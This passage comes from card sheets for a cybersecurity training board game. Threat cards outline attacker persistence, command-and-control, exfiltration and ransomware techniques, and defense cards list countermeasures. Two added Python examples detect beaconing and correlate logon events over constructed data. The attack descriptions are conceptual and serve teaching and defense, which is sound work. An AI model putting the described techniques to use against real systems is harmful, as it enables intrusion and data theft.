│ every 6 hours and runs a script │
│ from a hidden directory. The │
│ activity occurs outside normal │
│ business hours. Timestamp metadata │
│ indicates advanced timestomping." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Scheduled tasks run with privileges │
│ of the owner account and survive │
│ reboots. They blend in with │
│ legitimate administrative tasks. │
│ Windows Event Logs may not be │
│ forwarded centrally, allowing this │
│ persistence mechanism to hide. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE │
├─────────────────────────────────────┤
│ Step: PERSISTENCE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Registry analysis detects a new │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual │
│ location. The binary has │
│ obfuscated metadata and a fake │
│ digital signature. It executes at │
│ every system startup." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Registry Run keys execute at startup│
│ with persistence across reboots. │
│ They're difficult to distinguish │
│ from legitimate startup programs. │
│ Endpoint detection solutions must │
│ actively monitor registry writes. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your threat intelligence feed │
│ alerts on suspicious outbound │
│ HTTPS connections to a domain │
│ associated with known malware. │
│ Netflow shows regular 3-minute │
│ intervals of encrypted traffic. │
│ The pattern matches documented C2 │
│ beaconing behavior." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Beaconing establishes command and │
│ control communication with the │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection │
│ difficult. Threat intelligence and │
│ behavioral analysis (unusual timing)│
│ are required for detection. │
└─────────────────────────────────────┘
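Behavioral detection of the regular-interval pattern this card describes, as an added example that is not part of the card deck: it groups constructed NetFlow-style records by (source, destination, port) and flags pairs whose connections are both frequent and nearly evenly spaced. Hostnames, timestamps and the jitter threshold are assumptions.

```python
"""Beacon detection over constructed NetFlow-style records (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed flow log, one record per line:
#   "<ISO time> <src_host> <dst> <dst_port> <bytes>"
# ws-017 -> cdn-update.example fires every ~3 minutes (the beacon);
# ws-017 -> mail.example is ordinary bursty user traffic (control case).
SAMPLE_FLOWS = """\
2024-05-01T02:00:00 ws-017 cdn-update.example 443 1420
2024-05-01T02:03:01 ws-017 cdn-update.example 443 1398
2024-05-01T02:06:00 ws-017 cdn-update.example 443 1411
2024-05-01T02:08:59 ws-017 cdn-update.example 443 1402
2024-05-01T02:12:02 ws-017 cdn-update.example 443 1419
2024-05-01T02:15:00 ws-017 cdn-update.example 443 1405
2024-05-01T02:00:40 ws-017 mail.example 443 5210
2024-05-01T02:01:05 ws-017 mail.example 443 880
2024-05-01T02:07:30 ws-017 mail.example 443 12044
2024-05-01T02:07:55 ws-017 mail.example 443 640
2024-05-01T02:20:10 ws-017 mail.example 443 7733
2024-05-01T02:31:00 ws-017 mail.example 443 2210
"""


def parse_flows(text):
    """Parse the constructed flow format into (time, src, dst, port, bytes) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, nbytes = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(port), int(nbytes)))
    return flows


def interval_stats(times):
    """Return (mean gap, std dev, coefficient of variation) for sorted connection times."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return None
    m = mean(gaps)
    sd = pstdev(gaps)
    cv = sd / m if m else float("inf")  # jitter relative to the period
    return m, sd, cv


def find_beacons(flows, min_connections=5, max_jitter=0.10):
    """Flag (src, dst, port) pairs with many connections at a near-constant period.

    max_jitter is the highest coefficient of variation we still call "regular";
    real C2 frameworks add deliberate jitter, so tune it per environment
    (this value is an assumption for the constructed data).
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, _ in flows:
        by_pair[(src, dst, port)].append(ts)

    hits = []
    for (src, dst, port), times in by_pair.items():
        if len(times) < min_connections:
            continue  # too few connections to judge periodicity
        stats = interval_stats(times)
        if stats is None:
            continue
        m, _, cv = stats
        if cv <= max_jitter:
            hits.append({
                "src": src,
                "dst": dst,
                "port": port,
                "count": len(times),
                "mean_interval_s": round(m, 1),
                "jitter": round(cv, 3),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_flows(SAMPLE_FLOWS)):
        print(f"possible beacon: {hit['src']} -> {hit['dst']}:{hit['port']} "
              f"every {hit['mean_interval_s']}s (jitter {hit['jitter']})")
```

The mail.example flows have six connections too, so they pass the count check and are rejected only by their irregular spacing; that is the behavioral half the card calls for.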
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Database audit logs show a large │
│ SELECT query executed by a service │
│ account retrieving customer data. │
│ Results (500k+ records) were piped │
│ to a temporary file. System logs │
│ show this file was copied to cloud │
│ storage via an encrypted connection."│
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Database exfiltration bypasses │
│ endpoint controls. Attackers use │
│ legitimate protocols (HTTPS, SFTP) │
│ to trusted services (S3, Dropbox). │
│ Without DLP (Data Loss Prevention) │
│ and egress filtering, detection is │
│ nearly impossible. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "EDR alerts spike as multiple │
│ processes begin encrypting files │
│ on the file server. Hundreds of │
│ files change extension to '.locked'.│
│ A ransom note appears on all │
│ administrative workstations. Network│
│ traffic shows exfil before encryption│
│ began (double extortion tactic)." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Modern ransomware exfiltrates data │
│ first (to extort payment), then │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Browser logs show installation of │
│ a suspicious extension claiming to │
│ be a productivity tool. Traffic │
│ analysis reveals the extension is │
│ capturing keystrokes and session │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Browser extensions run with full │
│ access to user activity. They can │
│ capture credentials, intercept │
│ HTTPS traffic (before encryption), │
│ and persist across browser updates. │
│ Extension vetting and endpoint │
│ protection are critical defenses. │
└─────────────────────────────────────┘
Defense cards counter specific Attack Vectors:
- SOCIAL ENGINEERING
- WEB EXPLOIT
- CREDENTIAL ABUSE
- MALWARE
- NETWORK
- DATA EXFIL
Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy SPF (Sender Policy │
│ Framework), DKIM (DomainKeys │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email │
│ spoofing. Implement enforcement │
│ policies to reject spoofed emails. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Blocks phishing emails claiming to │
│ be from your domain. Requires │
│ attackers to find alternative │
│ vectors. Also provides reporting on │
│ spoofing attempts. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing, │
│ urgency tactics, and credential │
│ harvesting attempts. Run simulated │
│ phishing campaigns. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first │
│ line of defense. Works best when │
│ combined with technical controls. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy automated Windows Update │
│ management across all systems. │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2 │
│ weeks). Audit compliance with patch │
│ reporting. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Closes browser and kernel │
│ vulnerabilities. Prevents watering │
│ hole and exploit kit attacks. │
│ Should be combined with vulnerability│
│ scanning to identify gaps. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy perimeter firewall rules to │
│ block unauthorized outbound │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business │
│ traffic. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents early-stage lateral │
│ movement and C2 beaconing. │
│ Slows attacker reconnaissance. │
│ Must be maintained with threat │
│ intelligence feeds. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy centralized log aggregation │
│ (syslog, Splunk, ELK). Forward │
│ Windows Event Logs, firewall logs, │
│ DNS queries, and proxy logs to │
│ central SIEM. Configure syslog │
│ integrity protection. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes local log tampering difficult.│
│ Provides investigative visibility │
│ into attacker activities. Foundation│
│ for threat hunting and compliance. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy signature-based antivirus │
│ across all endpoints. Enable │
│ automatic definition updates │
│ (daily). Configure real-time file │
│ and email scanning. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches known malware variants. │
│ Does not detect zero-day or │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement the 3-2-1 backup │
│ strategy: 3 copies of data, 2 │
│ different storage types, 1 offsite │
│ copy. Test restore procedures │
│ quarterly. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables rapid recovery from │
│ ransomware. Ensures data │
│ availability even if primary │
│ systems are compromised. Critical │
│ for business continuity. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish an incident response │
│ program with detailed runbooks for │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware, │
│ insider threats, supply chain │
│ compromise. Include roles, │
│ responsibilities, and communication │
│ plans. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables faster, more coordinated │
│ response when incidents occur. │
│ Reduces confusion during high- │
│ pressure situations. Improves │
│ incident containment and recovery │
│ time. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy MFA for all remote access │
│ (VPN, RDP), email, and admin │
│ portals. Use authenticator apps or │
│ hardware tokens (not SMS). Enforce │
│ MFA on sensitive user accounts. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes compromised credentials │
│ useless without the second factor. │
│ Blocks credential stuffing attacks. │
│ Most effective single security │
│ measure against account takeover. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy EDR agent on all endpoints. │
│ Monitor process execution, file │
│ creation, registry modifications, │
│ and memory injection attempts. │
│ Enable behavioral analytics and │
│ automated response. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and │
│ threat hunting. Provides deep │
│ visibility into attack progression. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement VLANs and microsegmentation│
│ to separate user workstations from │
│ servers. Deploy firewall rules │
│ between segments. Implement zero- │
│ trust network access controls. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents lateral movement via SMB │
│ and other internal protocols. │
│ Limits blast radius of compromise. │
│ Forces attackers to find alternate │
│ paths. Combined with MFA, highly │
│ effective. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Create SIEM rules to detect attack │
│ patterns: failed login spikes, │
│ privilege escalation attempts, │
│ unusual process creation, scheduled │
│ task creation, and data exfil │
│ indicators. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Correlates events across logs to │
│ detect multi-step attacks. Reduces │
│ alert fatigue through smart │
│ aggregation. Enables faster │
│ investigation and response. │
└─────────────────────────────────────┘
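One way to implement the multi-step correlation this card describes, tying together the off-hours VPN login of the Compromised Credentials card and the task creation of the Scheduled Task Persistence card; this is an added example, not deck material. Event IDs 4625, 4624 and 4698 are the standard Windows Security log IDs for failed logon, successful logon and scheduled task creation; users, hosts, timestamps and window sizes are constructed assumptions.

```python
"""Multi-step SIEM correlation over constructed Windows Security events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events, one per line: "<ISO time> <EventID> <user> <host> <detail>"
# jdoe: 5 failed logons in under a minute, then a success from the same IP,
#       then a scheduled task 41 minutes later  -> full attack chain.
# asmith: one typo, a success, and a routine backup task -> benign control case.
SAMPLE_EVENTS = """\
2024-05-01T03:00:05 4625 jdoe vpn-gw 203.0.113.9
2024-05-01T03:00:09 4625 jdoe vpn-gw 203.0.113.9
2024-05-01T03:00:14 4625 jdoe vpn-gw 203.0.113.9
2024-05-01T03:00:20 4625 jdoe vpn-gw 203.0.113.9
2024-05-01T03:00:27 4625 jdoe vpn-gw 203.0.113.9
2024-05-01T03:00:33 4624 jdoe vpn-gw 203.0.113.9
2024-05-01T03:41:10 4698 jdoe ws-017 SyncHealth
2024-05-01T08:55:00 4625 asmith ws-022 10.0.5.22
2024-05-01T08:55:40 4624 asmith ws-022 10.0.5.22
2024-05-01T09:30:00 4698 asmith ws-022 NightlyBackup
"""

# Rule parameters (assumptions; tune to the environment's baseline).
SPIKE_THRESHOLD = 5                   # failed logons needed to call it a spike
SPIKE_WINDOW = timedelta(minutes=10)  # ...within this span
SUCCESS_WINDOW = timedelta(minutes=10)  # success after the spike within this span
PERSIST_WINDOW = timedelta(hours=1)   # task creation after the success within this span


def parse_events(text):
    """Parse the constructed event format into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, host, extra = line.split(maxsplit=4)
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user, "host": host, "extra": extra})
    return sorted(events, key=lambda e: e["time"])


def first_spike_end(failures):
    """Return the time the failed-logon spike completes, or None if there is none."""
    for i in range(len(failures) - SPIKE_THRESHOLD + 1):
        first, last = failures[i], failures[i + SPIKE_THRESHOLD - 1]
        if last["time"] - first["time"] <= SPIKE_WINDOW:
            return last["time"]
    return None


def correlate(events):
    """Chain failed-logon spike -> logon after spike -> scheduled task, per user.

    Severity rises with each stage observed, so a lone spike is worth a look
    but a spike followed by success and persistence is the card's
    "multi-step attack" and gets the highest severity.
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        spike_end = first_spike_end([e for e in evs if e["id"] == 4625])
        if spike_end is None:
            continue  # no brute-force / stuffing signal for this user

        success = next((e for e in evs if e["id"] == 4624
                        and spike_end <= e["time"] <= spike_end + SUCCESS_WINDOW), None)
        if success is None:
            alerts.append({"user": user, "severity": "medium",
                           "stages": ["failed-login-spike"], "source": None, "task": None})
            continue

        task = next((e for e in evs if e["id"] == 4698
                     and success["time"] <= e["time"] <= success["time"] + PERSIST_WINDOW), None)
        stages = ["failed-login-spike", "login-after-spike"]
        severity = "high"
        if task is not None:
            stages.append("scheduled-task-created")
            severity = "critical"
        alerts.append({"user": user, "severity": severity, "stages": stages,
                       "source": success["extra"], "task": task["extra"] if task else None})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity'].upper()}] {alert['user']}: "
              f"{' -> '.join(alert['stages'])} (from {alert['source']}, task={alert['task']})")
```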
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data │
│ (customer PII, source code, trade │
│ secrets). Block or alert on │
│ unauthorized transfers to cloud │
│ storage, email, USB, or external │
│ networks. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents SQL database exfiltration │
│ and bulk data theft. Detects │
│ unusual data access patterns. │
│ Enforces data security policies. │
│ Works best with strong authentication│
│ and encryption. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy enterprise password vault │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement │
│ password rotation policies for │
│ service accounts. Enable audit │
│ logging for credential access. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents credential reuse attacks. │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy network-based IPS with │
│ exploit signatures. Monitor for │
│ known CVE exploitation patterns. │
│ Configure WAF (Web Application │
│ Firewall) rules for SQL injection, │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Blocks exploitation attempts in │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK, │
│ DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Subscribe to threat intelligence │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM, │
│ and proxy. Participate in │
│ information sharing communities. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables faster detection of known │
│ malicious IPs and domains. │
│ Identifies emerging threats │
│ targeting your industry. Reduces │
│ detection time from days to minutes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish proactive threat hunting │
│ using MITRE ATT&CK framework. │
│ Hunt for living-off-the-land │
│ techniques, anomalous processes, │
│ suspicious registry changes, and │
│ memory injection. Use automated │
│ tools (OSQuery, Velociraptor). │
├─────────────────────────────────────┤
│ EFFECT: │
│ Finds advanced attacks that bypass │
│ signature-based detection. Detects │
│ LSASS dumping, scheduled task │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MEMORY FORENSICS │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy memory capture and analysis │
│ (Volatility, Memoryze). Create │
│ memory images of suspicious systems.│
│ Analyze for credential dumping, │
│ injected code, and rootkits. Extract│
│ evidence for incident response. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects Mimikatz attacks and │
│ credential harvesting. Reveals │
│ attacker activities hidden from │
│ disk forensics. Critical for │
│ identifying advanced persistence │
│ mechanisms. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS) │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy decoy systems (fake file │
│ servers, databases, credentials) │
│ to detect lateral movement. Create │
│ canary tokens that alert when │
│ accessed. Deploy honeypots for web │
│ exploit detection. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Any access to honeypots indicates │
│ active compromise. Detects lateral │
│ movement with zero false positives. │
│ Slows attacker progress and forces │
│ reconnaissance, increasing detection│
│ time. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Enable Windows Credential Guard to │
│ isolate LSASS in virtualized │
│ container. Implement UEFI Secure │
│ Boot to prevent bootkit attacks. │
│ Enable TPM attestation for device │
│ integrity validation. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes Mimikatz credential dumping │
│ ineffective. Prevents bootloader │
│ manipulation. Ensures firmware │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in │
│ isolated environments. Generate │
│ behavioral indicators and YARA │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement zero-trust architecture: │
│ verify every access request │
│ regardless of source. Deploy device │
│ identity, user identity, and │
│ behavior analytics. Implement │
│ conditional access policies. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Eliminates implicit trust based on │
│ network location. Even compromised │
│ devices cannot access sensitive │
│ resources without proper │
│ authentication and behavior │
│ validation. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy container runtime security │
│ (Falco, Sysdig). Implement image │
│ scanning for vulnerabilities. Use │
│ policy enforcement engines (OPA/ │
│ Gatekeeper). Implement network │
│ policies for container │
│ segmentation. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects container escape attempts. │
│ Prevents vulnerable images from │
│ running. Limits lateral movement │
│ within containerized environments. │
│ Critical for modern cloud │
│ applications. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM) │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy enterprise SIEM (Splunk, │
│ ELK, QRadar). Centralize logs from │
│ all sources. Implement automated │
│ correlation rules, threat │
│ intelligence integration, and │
│ incident response workflows. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Provides centralized visibility │
│ into all security events. Enables │
│ rapid threat detection and │
│ investigation. Foundation for a │
│ mature incident response program. │
└─────────────────────────────────────┘
Distribution by Countermeasure (v2.2):
- SOCIAL ENGINEERING: 2 defenses (D-01, D-02)
- WEB EXPLOIT: 2 defenses (D-03, D-18)
- CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20)
- MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21)
- NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24)
- DATA EXFIL: 2 defenses (D-11, D-24)
Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.
The ideas below have been built out as printable expansion cards:
Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.
Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.
Sample card sheets for Incident Zero board game
For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md
cards/incident-response/expansion-deck/advanced-threats.md
This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your monitoring systems detect │
│ unusual outbound connections from │
│ a recently deployed software update │
│ to an IP address not associated │
│ with the vendor. The update was │
│ digitally signed but verification │
│ shows the signature was backdated. │
│ Hundreds of organizations received │
│ the same malicious update." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Supply chain compromises affect │
│ entire industries simultaneously. │
│ Organizations trust vendor updates │
│ and often deploy them automatically │
│ without deep inspection. The │
│ attacker gains access to thousands │
│ of targets at once. Real-world │
│ example: SolarWinds, 3CX. │
│ │
│ DETECTION DIFFICULTY: High │
│ The malware appears legitimate due │
